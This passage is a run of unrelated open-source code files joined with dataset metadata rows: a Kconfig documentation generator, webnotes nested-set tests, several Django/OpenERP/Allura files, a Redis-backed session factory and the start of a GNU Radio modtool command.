e.g. 'My title,, with a comma'.""")
parser.add_argument(
"--separate-all-index",
action="store_true",
help="""\
Instead of listing all symbols in index.rst, use a separate
index-all.rst index page, which is linked from index.rst.
Probably only useful in combination with --modules.
index-all.rst has a 'configuration_options_all' RST link
target.
This option can make the documentation build orders of
magnitude faster when the index.rst generated by this script
is the top-level page, because Sphinx currently runs into a
bottleneck with large top-level pages with some themes. See
https://github.com/sphinx-doc/sphinx/issues/6909.""")
parser.add_argument(
"--keep-module-paths",
dest="strip_module_paths",
action="store_false",
help="Do not rewrite paths that fall within modules. See --modules.")
parser.add_argument(
"out_dir",
metavar="OUTPUT_DIRECTORY",
help="Directory to write .rst output files to")
return parser.parse_args()
def write_index_pages():
# Writes all index pages. --modules will give more than one.
# Implementation note: Functions used here add any newlines they want
# before their output themselves. Try to keep this consistent if you change
# things.
write_main_index_page()
write_module_index_pages()
def write_main_index_page():
# Writes the main index page, which lists all symbols. In --modules mode,
# links to the module index pages are included. If --separate-all-index was
# passed, a separate index-all.rst index is generated as well.
rst = index_header(title="Configuration Options",
link="configuration_options",
desc_path=index_desc)
if separate_all_index:
rst += """
This index page lists all symbols, regardless of where they are defined:
.. toctree::
:maxdepth: 1
index-all.rst\
"""
write_if_updated("index-all.rst",
index_header(title="All Configuration Options",
link="configuration_options_all",
desc_path=None) +
NO_MAX_WIDTH +
sym_table_rst("Configuration Options",
kconf.unique_defined_syms))
if modules:
rst += """
These index pages only list symbols defined within a particular subsystem:
.. toctree::
:maxdepth: 1
""" + "\n".join(" index-" + suffix for _, suffix, _, _, in modules)
if not separate_all_index:
rst += NO_MAX_WIDTH
# Put index of all symbols in index.rst
rst += sym_table_rst("All configuration options",
kconf.unique_defined_syms)
write_if_updated("index.rst", rst)
def write_module_index_pages():
# Writes index index-<suffix>.rst index pages for all modules
# Maps each module title to a set of Symbols in the module
module2syms = collections.defaultdict(set)
for sym in kconf.unique_defined_syms:
# Loop over all definition locations
for node in sym.nodes:
mod_title = path2module(node.filename)
if mod_title is not None:
module2syms[mod_title].add(node.item)
# Iterate 'modules' instead of 'module2syms' so that an index page gets
# written even if the module has no symbols
for title, suffix, _, desc_path in modules:
rst = index_header(title=title + " Configuration Options",
link="configuration_options_" + suffix,
desc_path=desc_path)
rst += NO_MAX_WIDTH
rst += sym_table_rst("Configuration Options",
module2syms[title])
write_if_updated(f"index-{suffix}.rst", rst)
def sym_table_rst(title, syms):
# Returns RST for the list of symbols on index pages. 'title' is the
# heading to use.
rst = f"""
{title}
{len(title)*'*'}
.. list-table::
:header-rows: 1
:widths: auto
* - Symbol name
- Prompt
"""
for sym in sorted(syms, key=attrgetter("name")):
rst += f"""\
* - :kconfig:`CONFIG_{sym.name}`
- {sym_index_desc(sym)}
"""
return rst
def sym_index_desc(sym):
# Returns the description used for 'sym' on the index page
for node in sym.nodes:
if node.prompt:
return escape_inline_rst(node.prompt[0])
# No help text or prompt
return ""
def index_header(title, link, desc_path):
# Returns the RST for the beginning of a symbol index page.
#
# title:
# Page title
#
# link:
# Link target string
#
# desc_path:
    #     Path to file with RST to put at the top of the page, underneath the
# heading. If None, a generic description is used.
if desc_path is None:
desc = DEFAULT_INDEX_DESC
else:
try:
with open(desc_path, encoding="utf-8") as f:
desc = f.read()
except OSError as e:
sys.exit("error: failed to open index description file "
f"'{desc_path}': {e}")
return f"""\
.. _{link}:
{title}
{len(title)*'='}
{desc}
This documentation is generated automatically from the :file:`Kconfig` files by
the :file:`{os.path.basename(__file__)}` script. Click on symbols for more
information."""
DEFAULT_INDEX_DESC = """\
:file:`Kconfig` files describe build-time configuration options (called symbols
in Kconfig-speak), how they're grouped into menus and sub-menus, and
dependencies between them that determine what configurations are valid.
:file:`Kconfig` files appear throughout the directory tree. For example,
:file:`subsys/power/Kconfig` defines power-related options.\
"""
def write_sym_pages():
# Writes all symbol and choice pages
for sym in kconf.unique_defined_syms:
write_sym_page(sym)
for choice in kconf.unique_choices:
write_choice_page(choice)
def write_dummy_syms_page():
# Writes a dummy page that just has targets for all symbol links so that
# they can be referenced from elsewhere in the documentation. This speeds
# up builds when we don't need the Kconfig symbol documentation.
rst = ":orphan:\n\nDummy symbols page for turbo mode.\n\n"
for sym in kconf.unique_defined_syms:
rst += f".. kconfig:: CONFIG_{sym.name}\n"
write_if_updated("dummy-syms.rst", rst)
def write_sym_page(sym):
# Writes documentation for 'sym' to <out_dir>/CONFIG_<sym.name>.rst
write_if_updated(f"CONFIG_{sym.name}.rst",
sym_header_rst(sym) +
help_rst(sym) +
direct_deps_rst(sym) +
defaults_rst(sym) +
select_imply_rst(sym) +
selecting_implying_rst(sym) +
kconfig_definition_rst(sym))
def write_choice_page(choice):
# Writes documentation for 'choice' to <out_dir>/choice_<n>.rst, where <n>
# is the index of the choice in kconf.choices (where choices appear in the
# same order as in the Kconfig files)
write_if_updated(choice_id(choice) + ".rst",
choice_header_rst(choice) +
help_rst(choice) +
direct_deps_rst(choice) +
defaults_rst(choice) +
choice_syms_rst(choice) +
kconfig_definition_rst(choice))
def sym_header_rst(sym):
# Returns RST that appears at the top of symbol reference pages
# - :orphan: suppresses warnings for the symbol RST files not being
# included in any toctree
#
# - '.. title::' sets the title of the document (e.g. <title>). This seems
# to be poorly documented at the moment.
return ":orphan:\n\n" \
f".. title:: {sym.name}\n\n" \
f".. kconfig:: CONFIG_{sym.name}\n\n" \
f"{prompt_rst(sym)}\n\n" \
f"Type: ``{kconfiglib.TYPE_TO_STR[sym.type]}``\n\n"
def choice_header_rst(choice):
# Returns RST that appears at the top of choice reference pages
return ":orphan:\n\n" \
f".. title:: {choice_desc(choice)}\n\n" \
f".. _{choice_id(choice)}:\n\n" \
f".. describe:: {choice_desc(choice)}\n\n" \
f"{prompt_rst(choice)}\n\n" \
f"Type: ``{kconfiglib.TYPE_TO_STR[choice.type]}``\n\n"
def prompt_rst(sc):
# Returns RST that lists the prompts of 'sc' (symbol or choice)
return "\n\n".join(f"*{escape_inline_rst(node.prompt[0])}*"
for node in sc.nodes if node.prompt) \
or "*(No prompt -- not directly user assignable.)*"
def help_rst(sc):
# Returns RST that lists the help text(s) of 'sc' (symbol or choice).
# Symbols and choices with multiple definitions can have multiple help
# texts.
rst = ""
for node in sc.nodes:
if node.help is not None:
rst += "Help\n" \
"====\n\n" \
".. code-block:: none\n\n" \
f"{textwrap.indent(node.help, 4 * ' ')}\n\n"
return rst
def direct_deps_rst(sc):
# Returns RST that lists the direct dependencies of 'sc' (symbol or choice)
if sc.direct_dep is sc.kconfig.y:
return ""
return "Direct dependencies\n" \
"===================\n\n" \
f"{expr_str(sc.direct_dep)}\n\n" \
"*(Includes any dependencies from ifs and menus.)*\n\n"
def defaults_rst(sc):
# Returns RST that lists the 'default' properties of 'sc' (symbol or
# choice)
if isinstance(sc, kconfiglib.Symbol) and sc.choice:
# 'default's on choice symbols have no effect (and generate a warning).
# The implicit value hint below would be misleading as well.
return ""
heading = "Default"
if len(sc.defaults) != 1:
heading += "s"
rst = f"{heading}\n{len(heading)*'='}\n\n"
if sc.defaults:
for value, cond in sc.orig_defaults:
rst += "- " + expr_str(value)
if cond is not sc.kconfig.y:
rst += " if " + expr_str(cond)
rst += "\n"
else:
rst += "No defaults. Implicitly defaults to "
if isinstance(sc, kconfiglib.Choice):
rst += "the first (visible) choice option.\n"
elif sc.orig_type in (kconfiglib.BOOL, kconfiglib.TRISTATE):
rst += "``n``.\n"
else:
# This is accurate even for int/hex symbols, though an active
# 'range' might clamp the value (which is then treated as zero)
rst += "the empty string.\n"
return rst + "\n"
def choice_syms_rst(choice):
# Returns RST that lists the symbols contained in the choice
if not choice.syms:
return ""
rst = "Choice options\n" \
"==============\n\n"
for sym in choice.syms:
# Generates a link
rst += f"- {expr_str(sym)}\n"
return rst + "\n"
def select_imply_rst(sym):
# Returns RST that lists the symbols 'select'ed or 'imply'd by the symbol
rst = ""
def add_select_imply_rst(type_str, lst):
# Adds RST that lists the selects/implies from 'lst', which holds
# (<symbol>, <condition>) tuples, if any. Also adds a heading derived
# from 'type_str' if there any selects/implies.
nonlocal rst
if lst:
heading = f"Symbols {type_str} by this symbol"
rst += f"{heading}\n{len(heading)*'='}\n\n"
for select, cond in lst:
rst += "- " + rst_link(select)
if cond is not sym.kconfig.y:
rst += " if " + expr_str(cond)
rst += "\n"
rst += "\n"
add_select_imply_rst("selected", sym.orig_selects)
add_select_imply_rst("implied", sym.orig_implies)
return rst
def selecting_implying_rst(sym):
# Returns RST that lists the symbols that are 'select'ing or 'imply'ing the
# symbol
rst = ""
def add_selecting_implying_rst(type_str, expr):
# Writes a link for each symbol that selects the symbol (if 'expr' is
# sym.rev_dep) or each symbol that imply's the symbol (if 'expr' is
# sym.weak_rev_dep). Also adds a heading at the top derived from
# type_str ("select"/"imply"), if there are any selecting/implying
# symbols.
nonlocal rst
if expr is not sym.kconfig.n:
heading = f"Symbols that {type_str} this symbol"
rst += f"{heading}\n{len(heading)*'='}\n\n"
# The reverse dependencies from each select/imply are ORed together
for select in kconfiglib.split_expr(expr, kconfiglib.OR):
# - 'select/imply A if B' turns into A && B
# - 'select/imply A' just turns into A
#
# In both cases, we can split on AND and pick the first
# operand.
rst += "- {}\n".format(rst_link(
kconfiglib.split_expr(select, kconfiglib.AND)[0]))
rst += "\n"
add_selecting_implying_rst("select", sym.rev_dep)
add_selecting_implying_rst("imply", sym.weak_rev_dep)
return rst
def kconfig_definition_rst(sc):
# Returns RST that lists the Kconfig definition location, include path,
# menu path, and Kconfig definition for each node (definition location) of
# 'sc' (symbol or choice)
# Fancy Unicode arrow. Added in '93, so ought to be pretty safe.
arrow = " \N{RIGHTWARDS ARROW} "
def include_path(node):
if not node.include_path:
# In the top-level Kconfig file
return ""
return "Included via {}\n\n".format(
arrow.join(f"``{strip_module_path(filename)}:{linenr}``"
for filename, linenr in node.include_path))
def menu_path(node):
path = ""
while node.parent is not node.kconfig.top_node:
node = node.parent
# Promptless choices can show up as parents, e.g. when people
# define choices in multiple locations to add symbols. Use
# standard_sc_expr_str() to show them. That way they show up as
# '<choice (name if any)>'.
path = arrow + \
(node.prompt[0] if node.prompt else
kconfiglib.standard_sc_expr_str(node.item)) + \
path
return "(Top)" + path
heading = "Kconfig definition"
if len(sc.nodes) > 1: heading += "s"
rst = f"{heading}\n{len(heading)*'='}\n\n"
for node in sc.nodes:
rst += "\n\n" \
f"At ``{strip_module_path(node.filename)}:{node.linenr}``\n\n" \
f"{include_path(node)}" \
f"Menu path: {menu_path(node)}\n\n" \
".. code-block:: kconfig\n\n" \
f"{textwrap.indent(str(node), 4*' ')}"
# Not the last node?
if node is not sc.nodes[-1]:
# Add a horizontal line between multiple definitions
rst += "\n\n----"
rst += "\n\n*(The 'depends on' condition includes propagated " \
"dependencies from ifs and menus.)*"
return rst
def choice_id(choice):
# Returns "choice_<n>", where <n> is the index of the choice in the Kconfig
# files. The choice that appears first has index 0, the next one index 1,
# etc.
#
# This gives each choice a unique ID, which is used to generate its RST
# filename and in cross-references. Choices (usually) don't have names, so
# we can't use that, and the prompt isn't guaranteed to be unique.
# Pretty slow, but fast enough
return f"choice_{choice.kconfig.unique_choices.index(choice)}"
def choice_desc(choice):
# Returns a description of the choice, used as the title of choice
# reference pages and in link texts. The format is
# "choice <name, if any>: <prompt text>"
desc = "choice"
if choice.name:
desc += " " + choice.name
# The choice might be defined in multiple locations. Use the prompt from
# the first location that has a prompt.
for node in choice.nodes:
if node.prompt:
desc += ": " + node.prompt[0]
break
return desc
def path2module(path):
# Returns the name of module that 'path' appears in, or None if it does not
# appear in a module. 'path' is assumed to be relative to 'srctree'.
# Have to be careful here so that e.g. foo/barbaz/qaz isn't assumed to be
# part of a module with path foo/bar/. Play it safe with pathlib.
abspath = pathlib.Path(kconf.srctree).joinpath(path).resolve()
for name, _, mod_path, _ in modules:
try:
abspath.relative_to(mod_path)
except ValueError:
# Not within the module
continue
return name
return None
def strip_module_path(path):
# If 'path' is within a module, strips the module path from it, and adds a
# '<module name>/' prefix. Otherwise, returns 'path' unchanged. 'path' is
# assumed to be relative to 'srctree'.
if strip_module_paths:
abspath = pathlib.Path(kconf.srctree).joinpath(path).resolve()
for title, _, mod_path, _ in modules:
try:
relpath = abspath.relative_to(mod_path)
except ValueError:
# Not within the module
continue
return f"<{title}>{os.path.sep}{relpath}"
for title, mod_path in no_index_modules:
try:
relpath = abspath.relative_to(mod_path)
except ValueError:
continue
return f"<{title}>{os.path.sep}{relpath}"
return path
def write_if_updated(filename, s):
# Wrapper around gen_helpers.write_if_updated() that uses 'out_dir'.
gen_helpers.write_if_updated(os.path.join(out_dir, filename), s)
if __name__ == "__main__":
main()
| apache-2.0 | 2,115,952,332,719,019,300 | 30.740828 | 110 | 0.60475 | false |
saurabh6790/omn-lib | webnotes/tests/test_nested_set.py | 37 | 3754 | import unittest, webnotes
class TestNSM(unittest.TestCase):
def setUp(self):
webnotes.conn.sql("delete from `tabItem Group`")
self.data = [
["t1", None, 1, 20],
["c0", "t1", 2, 3],
["c1", "t1", 4, 11],
["gc1", "c1", 5, 6],
["gc2", "c1", 7, 8],
["gc3", "c1", 9, 10],
["c2", "t1", 12, 17],
["gc4", "c2", 13, 14],
["gc5", "c2", 15, 16],
["c3", "t1", 18, 19]
]
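        # The (lft, rgt) pairs above follow the nested-set convention: each
        # descendant's interval lies inside its parent's interval, e.g.
        # gc1 (5, 6) is inside c1 (4, 11), which is inside t1 (1, 20).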
for d in self.data:
b = webnotes.bean([{
"doctype": "Item Group", "item_group_name": d[0], "parent_item_group": d[1],
"__islocal": 1, "is_group": "Yes"
}])
b.insert()
self.__dict__[d[0]] = b
self.reload_all()
def reload_all(self, data=None):
for d in data or self.data:
self.__dict__[d[0]].load_from_db()
def test_basic_tree(self, data=None):
for d in data or self.data:
self.assertEquals(self.__dict__[d[0]].doc.lft, d[2])
self.assertEquals(self.__dict__[d[0]].doc.rgt, d[3])
def test_validate_loop_move(self):
self.c1.doc.parent_item_group = 'gc3'
self.assertRaises(webnotes.ValidationError, self.c1.save)
def test_rebuild_tree(self):
from webnotes.utils.nestedset import rebuild_tree
rebuild_tree("Item Group", "parent_item_group")
self.test_basic_tree(self.data)
def test_move_group(self):
self.c1.doc.parent_item_group = 'c2'
self.c1.save()
self.reload_all()
new_tree = [
["t1", None, 1, 20],
["c0", "t1", 2, 3],
["c2", "t1", 4, 17],
["gc4", "c2", 5, 6],
["gc5", "c2", 7, 8],
["c1", "t1", 9, 16],
["gc1", "c1", 10, 11],
["gc2", "c1", 12, 13],
["gc3", "c1", 14, 15],
["c3", "t1", 18, 19]
]
self.test_basic_tree(new_tree)
# Move back
self.c1.doc.parent_item_group = 'gc4'
self.c1.save()
self.reload_all()
new_tree = [
["t1", None, 1, 20],
["c0", "t1", 2, 3],
["c2", "t1", 4, 17],
["gc4", "c2", 5, 14],
["c1", "t1", 6, 13],
["gc1", "c1", 7, 8],
["gc2", "c1", 9, 10],
["gc3", "c1", 11, 12],
["gc5", "c2", 15, 16],
["c3", "t1", 18, 19]
]
self.test_basic_tree(new_tree)
# Move to root
# self.c1.doc.parent_item_group = ''
# self.c1.save()
# self.reload_all()
#
# new_tree = [
# ["t1", None, 1, 12],
# ["c0", "t1", 2, 3],
# ["c2", "t1", 4, 9],
# ["gc4", "c2", 5, 6],
# ["gc5", "c2", 7, 8],
# ["c3", "t1", 10, 11],
# ["c1", "t1", 13, 20],
# ["gc1", "c1", 14, 15],
# ["gc2", "c1", 16, 17],
# ["gc3", "c1", 18, 19],
# ]
# self.test_basic_tree(new_tree)
# move leaf
self.gc3.doc.parent_item_group = 'c2'
self.gc3.save()
self.reload_all()
new_tree = [
["t1", None, 1, 20],
["c0", "t1", 2, 3],
["c2", "t1", 4, 17],
["gc4", "c2", 5, 12],
["c1", "t1", 6, 11],
["gc1", "c1", 7, 8],
["gc2", "c1", 9, 10],
["gc5", "c2", 13, 14],
["gc3", "c2", 15, 16],
["c3", "t1", 18, 19]
]
self.test_basic_tree(new_tree)
# delete leaf
from webnotes.model import delete_doc
delete_doc(self.gc2.doc.doctype, self.gc2.doc.name)
new_tree = [
["t1", None, 1, 18],
["c0", "t1", 2, 3],
["c2", "t1", 4, 15],
["gc4", "c2", 5, 10],
["c1", "t1", 6, 9],
["gc1", "c1", 7, 8],
["gc5", "c2", 11, 12],
["gc3", "c2", 13, 14],
["c3", "t1", 16, 17]
]
del self.__dict__["gc2"]
self.reload_all(new_tree)
self.test_basic_tree(new_tree)
#print webnotes.conn.sql("""select name, parent_item_group, lft, rgt from `tabItem Group`""")
# for testing
# for d in new_tree:
# doc = self.__dict__[d[0]].doc
# print doc.name, doc.lft, doc.rgt
def tearDown(self):
webnotes.conn.rollback()
if __name__=="__main__":
import webnotes
webnotes.connect()
unittest.main() | mit | -6,099,264,567,639,548,000 | 22.46875 | 95 | 0.486947 | false |
apache/incubator-allura | ForgeGit/forgegit/tests/__init__.py | 3 | 1048 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Make our own Git tool test decorator
from allura.tests.decorators import with_tool
with_git = with_tool('test', 'Git', 'src-git', 'Git', type='git')
| apache-2.0 | -4,043,995,509,077,892,000 | 42.666667 | 68 | 0.69084 | false |
vecnet/om | website/apps/ts_om_edit/views/ScenarioDeploymentsView.py | 1 | 6440 | # -*- coding: utf-8 -*-
#
# This file is part of the VecNet OpenMalaria Portal.
# For copyright and licensing information about this package, see the
# NOTICE.txt and LICENSE.txt files in its top-level directory; they are
# available at https://github.com/vecnet/om
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License (MPL), version 2.0. If a copy of the MPL was not distributed
# with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
from functools import partial, wraps
import json
from xml.etree.ElementTree import ParseError
from django.core.exceptions import PermissionDenied
from django.forms.formsets import formset_factory
from django.http import HttpResponse
from django.template.loader import render_to_string
from vecnet.openmalaria.scenario import Scenario
from website.apps.ts_om.models import Scenario as ScenarioModel
from website.apps.ts_om_edit.forms import ScenarioDeploymentsForm, ScenarioDeploymentForm
from website.apps.ts_om_edit.views.ScenarioBaseFormView import ScenarioBaseFormView
from website.apps.ts_om.views.ScenarioValidationView import rest_validate
class ScenarioDeploymentsView(ScenarioBaseFormView):
template_name = "ts_om_edit/deployments.html"
form_class = ScenarioDeploymentsForm
next_url = 'ts_om.summary'
prev_url = 'ts_om.interventions'
step = "deployments"
def get_context_data(self, **kwargs):
context = super(ScenarioDeploymentsView, self).get_context_data(**kwargs)
extra_data = load_deployments_data(self.scenario)
new_context = context.copy()
new_context.update(extra_data)
return new_context
def form_valid(self, form, **kwargs):
component_ids = []
for intervention in self.scenario.interventions.human:
component_ids.append((intervention.id, intervention.id))
ScenarioDeploymentFormSet = formset_factory(wraps(ScenarioDeploymentForm)
(partial(ScenarioDeploymentForm, components=component_ids)),
extra=0, can_delete=True)
deployment_formset = ScenarioDeploymentFormSet(self.request.POST, prefix='deployment')
if not deployment_formset.is_valid():
return super(ScenarioDeploymentsView, self).form_invalid(form)
deployments = []
for form in deployment_formset:
deployment_info = {
'components': form.cleaned_data["components"]
}
if 'xml' in form.cleaned_data and form.cleaned_data["xml"]:
# Preserve "continuous" deployment as a workaround for internal server error
deployment_info["xml"] = form.cleaned_data["xml"]
else:
if 'name' in form.cleaned_data and form.cleaned_data["name"] != "":
deployment_info['name'] = form.cleaned_data["name"]
times = form.cleaned_data["timesteps"].split(',')
coverages = form.cleaned_data["coverages"].split(',')
timesteps = []
for index, time in enumerate(times):
timesteps.append({
"time": time,
"coverage": coverages[index] if len(coverages) > index else coverages[0]
})
deployment_info["timesteps"] = timesteps
deployments.append(deployment_info)
self.scenario.interventions.human.deployments = deployments
return super(ScenarioDeploymentsView, self).form_valid(form, kwargs={'xml': self.scenario.xml})
def parse_deployments(scenario):
deployments = []
for deployment in scenario.interventions.human.deployments:
deployment_info = {'components': deployment.components}
try:
deployment_info["name"] = deployment.name
except AttributeError:
pass
deployment_info["xml"] = ""
try:
timesteps = deployment.timesteps
except:
# Temp workaround for internal server error when using <continuous> deployment
deployment_info["xml"] = deployment.xml
deployment_info["timesteps"] = '1'
deployment_info["coverages"] = '1'
deployments.append(deployment_info)
continue
times = [str(timestep["time"]) for timestep in timesteps]
coverages = [str(timestep["coverage"]) for timestep in timesteps]
deployment_info["timesteps"] = ','.join(times)
deployment_info["coverages"] = ','.join(coverages)
deployments.append(deployment_info)
return deployments
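# Illustrative shape of one entry in the list returned above (the field values
# are invented, not taken from a real scenario):
#   {'components': ['GVI'], 'name': 'LLIN distribution', 'xml': '',
#    'timesteps': '730,1095', 'coverages': '0.6,0.8'}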
def load_deployments_data(scenario):
component_ids = []
for intervention in scenario.interventions.human:
component_ids.append((intervention.id, intervention.id))
ScenarioDeploymentFormSet = formset_factory(wraps(ScenarioDeploymentForm)
(partial(ScenarioDeploymentForm, components=component_ids)),
extra=0, can_delete=True)
deployment_formset = ScenarioDeploymentFormSet(initial=parse_deployments(scenario),
prefix='deployment')
context = {}
context["deployment_formset"] = deployment_formset
context["has_components"] = len(component_ids) > 0
return context
def update_deployments_form(request, scenario_id):
if not request.user.is_authenticated() or not scenario_id or scenario_id < 0:
return
xml_file = request.POST['xml']
json_str = rest_validate(xml_file)
validation_result = json.loads(json_str)
valid = True if (validation_result['result'] == 0) else False
if not valid:
return HttpResponse(json_str, content_type="application/json")
model_scenario = ScenarioModel.objects.get(id=scenario_id)
if model_scenario is None:
return HttpResponse(json.dumps({'valid': False}), content_type="application/json")
if request.user != model_scenario.user:
raise PermissionDenied
try:
temp_scenario = Scenario(xml_file)
except ParseError:
return HttpResponse(json.dumps({'valid': False}), content_type="application/json")
extra_data = load_deployments_data(temp_scenario)
html = render_to_string("ts_om_edit/deployments_list.html", extra_data)
return HttpResponse(html)
| mpl-2.0 | 2,472,985,344,018,509,000 | 37.333333 | 112 | 0.647516 | false |
upconsulting/IsisCB | isiscb/isisdata/migrations/0078_auto_20180623_0200.py | 1 | 1055 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-06-23 02:00
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('isisdata', '0077_merge_20180607_0543'),
]
operations = [
migrations.AddField(
model_name='citation',
name='created_by_native',
field=models.ForeignKey(blank=True, help_text=b'The user who created this object.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='creator_of', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalcitation',
name='created_by_native',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL),
),
]
| mit | -4,456,069,879,641,526,000 | 36.678571 | 208 | 0.664455 | false |
trabacus-softapps/openerp-8.0-cc | openerp/addons/website_mail/__openerp__.py | 3 | 1696 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Website Mail',
'category': 'Hidden',
'summary': 'Website Module for Mail',
'version': '0.1',
'description': """Glue module holding mail improvements for website.""",
'author': 'OpenERP SA',
'depends': ['website', 'mail'],
'data': [
'views/snippets.xml',
'views/website_mail.xml',
'views/website_email_designer.xml',
'views/email_template_view.xml',
'security/website_mail.xml',
],
'css': [
'static/src/css/website_mail.css',
],
'js': [
'static/src/js/website_mail.js',
],
'qweb': [
'static/src/xml/website_mail.xml'
],
'installable': True,
'auto_install': True,
}
| agpl-3.0 | 4,391,138,260,093,430,300 | 34.333333 | 78 | 0.574882 | false |
donalm/webtest | lib/python/webtest/session_factory.py | 1 | 4655 | #!/usr/bin/env python
from txredisapi import UnixConnectionPool
from webtest.session_dict import PersistentSessionDict
from webtest import log
logger = log.get_logger()
def logging_errback(f, label="logging_errback"):
logger.error("%s: %s" % (label, f.getBriefTraceback()))
class RedisSessionFactory(object):
"""
    Factory for Redis-backed user sessions.

    This class provides the class methods used to create, retrieve, update
    and expire session data persisted in Redis.
@ivar uid: A unique identifier for the session, C{bytes}.
@ivar _reactor: An object providing L{IReactorTime} to use for scheduling
expiration.
@ivar defaultSessionTimeout: timeout of a session, in seconds.
"""
defaultSessionTimeout = 900
_expireCall = None
_pool = None
@classmethod
def _connected(cls, ucp):
"""
We successfully connected to a Redis service. Persist the resulting
connection object as an attribute on the class
"""
cls._pool = ucp
return ucp
@classmethod
def _connection_failed(cls, f):
"""
Log and escalate connection failures
"""
logger.error("ERROR: connection to Redis failed: %s", f.getBriefTraceback())
return f
@classmethod
def connect(cls):
"""
Establish a connection to the Redis service (if none exists)
"""
if cls._pool is None:
df = UnixConnectionPool("/var/run/redis/redis.sock", poolsize=2, reconnect=False)
df.addCallback(cls._connected)
df.addErrback(cls._connection_failed)
return df
return cls._pool
@classmethod
def connect_and_execute(cls, method, *args, **kwargs):
"""
This method should be used as a wrapper around methods that require a
connection to Redis. If no connection exists, one is created before the
'wrapped' method is executed.
"""
try:
df = method(cls._pool, *args, **kwargs)
except AttributeError:
df = cls.connect()
df.addCallback(method, *args, **kwargs)
df.addErrback(logging_errback, "connect_and_execute")
return df
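    # Example use of the lazy-connect wrapper above (illustrative only; the
    # session key accessed at the end is made up):
    #
    #   d = RedisSessionFactory.retrieve(uid, reactor)
    #   d.addCallback(lambda session: session.get("user_id"))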
@classmethod
def retrieve(cls, uid, reactor):
"""
Connect to Redis and get data from the persistence layer for a UID
"""
return cls.connect_and_execute(cls._retrieve, uid, reactor)
@classmethod
def _retrieve(cls, pool, uid, reactor):
"""
Get data from the persistence layer for a UID
"""
session_data_df = pool.hgetall(uid)
session_data_df.addCallback(cls._retrieve_callback, uid, reactor)
session_data_df.addErrback(logging_errback, "pool.hgetall")
return session_data_df
@classmethod
def _retrieve_callback(cls, session_data, uid, reactor):
"""
Inject the dict we retrieved from the storage layer into a
PersistentSessionDict obect and return it
"""
return PersistentSessionDict(uid, session_data, cls, reactor)
@classmethod
def expire(cls, uid):
"""
Connect to Redis and expire/logout a session.
"""
return cls.connect_and_execute(cls._expire, uid)
@classmethod
def _expire(cls, pool, uid):
"""
Expire/logout a session.
"""
return pool.delete(uid)
@classmethod
def delete_keys_from_session(cls, uid, keys):
"""
Connect to Redis and remove keys from the session hash
"""
return cls.connect_and_execute(cls._delete_keys_from_session, uid, keys)
@classmethod
def _delete_keys_from_session(cls, pool, uid, keys):
"""
Remove keys from the session hash
"""
        return pool.hdel(uid, *keys)
@classmethod
def patch_session(cls, uid, patch):
"""
        Connect to Redis and set or update values in the session hash
"""
return cls.connect_and_execute(cls._patch_session, uid, patch)
@classmethod
def _patch_session(cls, pool, uid, patch):
"""
Set or update values in the session hash
"""
return pool.hmset(uid, patch)
@classmethod
def touch_session(cls, uid, timeout=None):
"""
Connect to Redis and update the session expiry
"""
if timeout is None:
timeout = cls.defaultSessionTimeout
return cls.connect_and_execute(cls._touch_session, uid, timeout)
@classmethod
def _touch_session(cls, pool, uid, timeout):
"""
Update the session expiry
"""
return pool.expire(uid, timeout)
| mit | 2,445,796,118,297,768,400 | 28.839744 | 93 | 0.610956 | false |
pinkavaj/gnuradio | gr-utils/python/modtool/modtool_newmod.py | 51 | 4256 | #
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
""" Create a whole new out-of-tree module """
import shutil
import os
import re
from optparse import OptionGroup
from gnuradio import gr
from modtool_base import ModTool, ModToolException
from scm import SCMRepoFactory
class ModToolNewModule(ModTool):
""" Create a new out-of-tree module """
name = 'newmod'
aliases = ('nm', 'create')
def __init__(self):
ModTool.__init__(self)
def setup_parser(self):
" Initialise the option parser for 'gr_modtool newmod' "
parser = ModTool.setup_parser(self)
parser.usage = '%prog nm [options]. \n Call %prog without any options to run it interactively.'
ogroup = OptionGroup(parser, "New out-of-tree module options")
ogroup.add_option("--srcdir", type="string",
help="Source directory for the module template.")
parser.add_option_group(ogroup)
return parser
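    # For orientation, a hypothetical session (the module name is made up):
    #
    #   $ gr_modtool newmod acme
    #   Creating out-of-tree module in ./gr-acme... Done.
    #   Use 'gr_modtool add' to add a new block to this currently empty module.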
def setup(self, options, args):
